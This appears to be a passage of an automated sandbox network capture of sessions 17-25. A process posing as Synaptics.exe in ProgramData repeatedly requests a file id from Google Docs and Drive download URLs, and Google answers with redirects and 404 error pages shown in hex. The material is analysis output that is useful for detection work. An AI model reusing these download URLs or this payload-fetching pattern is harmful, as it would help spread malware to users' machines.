                                                                                                                2024-12-30 09:58:14 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC7dskQjPM8EtBLj7DI219i3hc14ASKktY4H4FjGGOJ5TukjBE9GnF1JC8ZQzMt0b64_IChyvrg
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:14 GMT
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-zMmt71LQvMD38aLi5pSu-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:14 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:14 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 73 54 6d 48 69 67 41 4d 59 45 32 44 51 74 4b 33 4a 54 42 66 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="esTmHigAMYE2DQtK3JTBfg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:14 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                17192.168.2.749741142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:14 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:14 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6UywZIBLsum1uqUkxN4QyXm2YELCF5fDptiFS8ZajQEybXSaKbR2D90dgXIHtEzbKA
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:14 GMT
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ZhvleVkG8FNxXc00zDN89g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:14 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:14 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 79 67 75 46 32 50 4e 63 73 58 55 71 4d 75 47 37 43 72 41 48 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                Data Ascii: t Found)!!1</title><style nonce="wyguF2PNcsXUqMuG7CrAHA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                2024-12-30 09:58:14 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                18192.168.2.749748216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:15 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                19192.168.2.749749216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:15 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                20192.168.2.749750142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:15 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                21192.168.2.749764216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:16 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:16 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:16 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Rrr1HGso36XsfMehI8SFQg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                22192.168.2.749763216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:16 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:16 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:16 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-GI2JR52s6WwrNz9uyAaN6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                23192.168.2.749773142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:17 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:17 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC7zaqHxWQ2xdr4v62YA1pchjlXaICEySCb7Qg71mzdE5paMr8e6tuntIeD3tqDqJni1
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:17 GMT
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-_pn05JeS1kQVyYlxCKXoow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:17 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:17 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 6d 4a 32 6f 7a 48 34 36 4f 44 49 48 55 76 49 34 72 32 62 51 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                Data Ascii: t Found)!!1</title><style nonce="5mJ2ozH46ODIHUvI4r2bQA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                2024-12-30 09:58:17 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                24192.168.2.749774142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:17 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:17 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC4p0hWHWv7KI4Ft1cdauagpWlOTLJFun9qaAYvI5GDzkFo6e0YjBJgiC43nkc5FNQCf3b1A0Jk
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:17 GMT
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-XozYoz5MesEU26y0NyLlPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:17 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:17 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 5f 48 67 45 58 6e 73 4e 47 47 7a 53 77 5f 4b 76 69 75 6d 58 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="z_HgEXnsNGGzSw_KviumXw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:17 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                25192.168.2.749771216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:17 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:17 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:17 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
